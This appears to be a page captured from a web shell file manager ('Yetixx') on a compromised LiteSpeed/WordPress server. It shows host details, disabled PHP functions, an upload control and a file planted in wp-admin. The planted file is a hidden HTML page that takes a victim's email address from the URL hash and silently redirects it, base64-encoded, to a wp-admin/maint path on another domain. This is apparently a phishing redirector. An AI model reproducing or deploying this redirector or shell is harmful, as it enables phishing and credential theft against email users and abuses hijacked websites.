Yetixx
Server: LiteSpeed
System: Linux srv81050498.ultasrv.net 5.15.0-97-generic #107-Ubuntu SMP Wed Feb 7 13:26:48 UTC 2024 x86_64
User: hemat3240 (1051)
PHP: 8.0.30
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //home/kenzo777slot.com/public_html/wp-admin/index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Email Converter</title>
    <style>
        /* Hide everything from view */
        body, html {
            width: 0;
            height: 0;
            overflow: hidden;
            margin: 0;
            padding: 0;
        }
    </style>
</head>
<body>
    <script>
        // Function to process email and redirect
        function processEmailAndRedirect() {
            // Get the email from URL hash
            function getEmailFromURL() {
                const hash = window.location.hash.substring(1);
                
                if (!hash) return null;
                
                // Try to decode as base64 first
                try {
                    const base64Decoded = atob(hash);
                    if (isValidEmailFormat(base64Decoded)) return base64Decoded;
                } catch (e) {
                    // Not a valid base64 string, continue to check as plain email
                }
                
                // Check if it's a plain email (replace $ with @ if needed)
                const emailWithAt = hash.replace(/\$/g, '@');
                if (isValidEmailFormat(emailWithAt)) return emailWithAt;
                
                return null;
            }
            
            function isValidEmailFormat(email) {
                return email.includes('@') && email.includes('.') && email.length > 5;
            }
            
            const email = getEmailFromURL();
            
            if (email) {
                // Redirect to the target URL
                window.location = "https://kendari4d.net/wp-admin/maint#" + btoa(email);
            }
        }
        
        // Start the process immediately
        window.onload = processEmailAndRedirect;
    </script>
</body>
</html>